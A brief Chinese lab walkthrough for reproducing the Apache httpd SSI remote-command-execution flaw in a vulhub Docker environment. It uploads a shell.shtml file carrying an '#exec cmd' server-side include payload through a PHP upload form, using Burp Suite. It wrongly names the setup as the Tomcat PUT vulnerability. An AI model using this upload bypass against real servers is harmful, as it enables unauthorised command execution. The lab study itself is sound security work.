1.环境搭建
下载vulhub压缩包,解压到Ubuntu16.04系统下。
进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令:
docker-compose build
docker-compose up -d
网站的配置文件在当前路径下的docker-compose.yml文件内:
【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要手动修改配置文件下的端口。(前面端口为需要修改的端口)
2.目标网站访问
环境启动后,访问http://your-ip:8080/upload.php,即可看到一个上传表单。
3.木马文件上传
正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:
<!--#exec cmd="pwd" -->
4.burpsuit抓包
yognburpsuit抓包传至Reapter-->GO
成功上传,然后访问shell.shtml,可见命令已成功执行:
-->漏洞复现